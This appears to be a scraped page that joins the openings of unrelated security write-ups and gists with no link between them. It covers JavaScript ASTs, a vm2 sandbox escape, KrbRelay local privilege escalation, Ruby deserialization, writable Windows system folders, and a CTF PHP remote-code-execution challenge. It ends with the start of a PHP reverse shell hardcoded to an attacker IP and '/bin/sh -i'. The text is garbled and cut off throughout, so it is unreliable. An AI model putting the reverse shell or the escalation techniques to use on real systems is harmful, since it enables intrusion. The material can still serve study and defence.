AST is short for Abstract Syntax Tree. An AST is an abstract decomposition of the logic of JavaScript code: it breaks the code's computation down into fine-grained steps and stores them as a tree in evaluation order. With an AST we can implement many things, such as syntax highlighting, syntax checking and code obfuscation; Babel, for instance, processes JavaScript code on top of an AST. Operations on an AST boil down to three kinds:
- parse JavaScript code into an AST
- modify the AST as required
- format the AST back into JavaScript code
Fortunately, the JavaScript ecosystem already has mature tools that implement these for us.
There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside handleException() which can be used to escape the sandbox and run arbitrary code in host context.
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from a low-privileged domain user to local system on domain-joined computers.
Prerequisites:
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/
Using YAML.dump(payload) in the above script doesn't work. It only produces the following YAML, which is worthless:
--- !ruby/object:Gem::Requirement
requirements:
- - ">="
- !ruby/object:Gem::Version
version: '0'
c:\windows\system32\microsoft\crypto\rsa\machinekeys
c:\windows\system32\tasks_migrated\microsoft\windows\pla\system
c:\windows\syswow64\tasks\microsoft\windows\pla\system
c:\windows\debug\wia
c:\windows\system32\tasks
c:\windows\syswow64\tasks
c:\windows\tasks
c:\windows\registration\crmlog
c:\windows\system32\com\dmp
c:\windows\system32\fxstmp
import base64
import re
import xml.dom.minidom
import json
import uuid
import struct
import string
import random
import hashlib
import time
The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');
Some additional hardening was applied to the PHP installation to make sure that previously known solutions wouldn't work (for further information, read this writeup from the challenge author).
I didn't solve the challenge during the competition (here is a writeup from someone who did), but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.12'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';